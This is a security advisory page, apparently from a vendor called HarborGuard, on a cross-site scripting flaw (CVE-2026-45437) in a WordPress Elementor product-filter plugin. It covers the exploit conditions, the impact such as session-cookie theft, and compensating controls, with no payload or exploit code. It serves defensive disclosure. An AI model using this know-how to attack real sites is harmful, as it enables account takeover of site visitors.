How is CVE-2026-45437 exploited?

Network reachability (required): The attacker must reach the WordPress site over the network; the plugin's vulnerable endpoint is exposed via standard HTTP/HTTPS. Authentication (not-required): No account or credentials are needed; the vulnerability is exploitable by any unauthenticated visitor. Victim interaction (required): A victim must follow a crafted link or visit an attacker-controlled page that triggers the malicious payload, making social engineering a necessary step. Attack complexity (info): Attack complexity is low, meaning the exploit is reliable and does not depend on race conditions or specific environmental configurations.

What is the impact of CVE-2026-45437?

Reads session cookies or authentication tokens from the victim's browser if the HttpOnly flag is absent, enabling account takeover. Injects attacker-controlled content into the page the victim is viewing, allowing credential-harvesting overlays or defacement. Executes arbitrary JavaScript in the victim's browser session, enabling actions on the WordPress site on the victim's behalf. Disrupts the rendered page's normal functionality, degrading the user experience for targeted visitors.

Back to search

HIGHCVE-2026-45437Published 2026-06-15Modified 2026-06-15CNA Patchstack

CVE-2026-45437: WordPress Product Filter Widget for Elementor plugin <= 1.0.6 - Cross Site Scripting (XSS) vulnerability

Q: What is CVE-2026-45437?

A reflected or stored cross-site scripting (XSS) vulnerability affects the Product Filter Widget for Elementor WordPress plugin at version 1.0.6 and below. The flaw is reachable over the network without any authentication, but requires a victim to interact with a malicious link or page, as indicated by the CVSS vector. Successful exploitation lets an attacker inject and execute arbitrary JavaScript in the victim's browser, enabling session hijacking, page content manipulation, and disruption of the affected page's functionality. HarborGuard is tracking this advisory and will make a patched-image rebuild available the moment an upstream fix is published.

Q: Is CVE-2026-45437 patched?

Because no fix version has been published for CVE-2026-45437, HarborGuard re-checks the Patchstack advisory on every ingest cycle and will make a patched-image rebuild available the moment an upstream fix is released. For customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be triggered automatically at that point.

Unauthenticated Cross Site Scripting (XSS) in Product Filter Widget for Elementor <= 1.0.6 versions.

CVSS v3.1: 7.1
Severity: HIGH
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

A reflected or stored cross-site scripting (XSS) vulnerability affects the Product Filter Widget for Elementor WordPress plugin at version 1.0.6 and below. The flaw is reachable over the network without any authentication, but requires a victim to interact with a malicious link or page, as indicated by the CVSS vector. Successful exploitation lets an attacker inject and execute arbitrary JavaScript in the victim's browser, enabling session hijacking, page content manipulation, and disruption of the affected page's functionality. HarborGuard is tracking this advisory and will make a patched-image rebuild available the moment an upstream fix is published.

HarborGuard Coverage

Detection

Detection of CVE-2026-45437 is available across every HarborGuard environment: the CVE is ingested from upstream feeds including Patchstack within minutes of publication and matched against customer images, including custom-built images that bundle this plugin. No manual configuration is required for the scan to run.

Available

Triage

HarborGuard is capable of scoring this CVE at its published CVSS v3.1 severity of 7.1 (HIGH) and weighting it against each environment's compliance policy to surface it at the appropriate priority. Routing to the correct team inbox within each customer org is handled automatically based on workload ownership mappings.

Available

Patch

Because no fix version has been published for CVE-2026-45437, HarborGuard re-checks the Patchstack advisory on every ingest cycle and will make a patched-image rebuild available the moment an upstream fix is released. For customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be triggered automatically at that point.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The attacker must reach the WordPress site over the network; the plugin's vulnerable endpoint is exposed via standard HTTP/HTTPS.
AuthenticationNot required
No account or credentials are needed; the vulnerability is exploitable by any unauthenticated visitor.
Victim interactionRequired
A victim must follow a crafted link or visit an attacker-controlled page that triggers the malicious payload, making social engineering a necessary step.
Attack complexityDetail
Attack complexity is low, meaning the exploit is reliable and does not depend on race conditions or specific environmental configurations.

Blast Radius

Reads session cookies or authentication tokens from the victim's browser if the HttpOnly flag is absent, enabling account takeover.
Injects attacker-controlled content into the page the victim is viewing, allowing credential-harvesting overlays or defacement.
Executes arbitrary JavaScript in the victim's browser session, enabling actions on the WordPress site on the victim's behalf.
Disrupts the rendered page's normal functionality, degrading the user experience for targeted visitors.

How HarborGuard Handles This

Available on HarborGuard: scanning for CVE-2026-45437 is active across any environment whose images bundle the Product Filter Widget for Elementor plugin at version 1.0.6 or below. Because no upstream fix exists at this time, HarborGuard monitors the Patchstack advisory on every ingest cycle. As compensating controls, teams can consider restricting network-policy access to WordPress endpoints that process unvalidated query parameters, applying a web application firewall rule to block reflected script payloads, and auditing plugin usage to determine whether the filter widget can be disabled on affected sites until a patch is available. The moment Bhavin Thummar or Patchstack publishes a fix version, HarborGuard will make a patched-image rebuild available; for customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be initiated automatically.

See how HarborGuard automates this

Affected packages

Bhavin Thummar / Product Filter Widget for Elementor
≤ 1.0.6

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

References

patchstack.com

Metrics

Get notified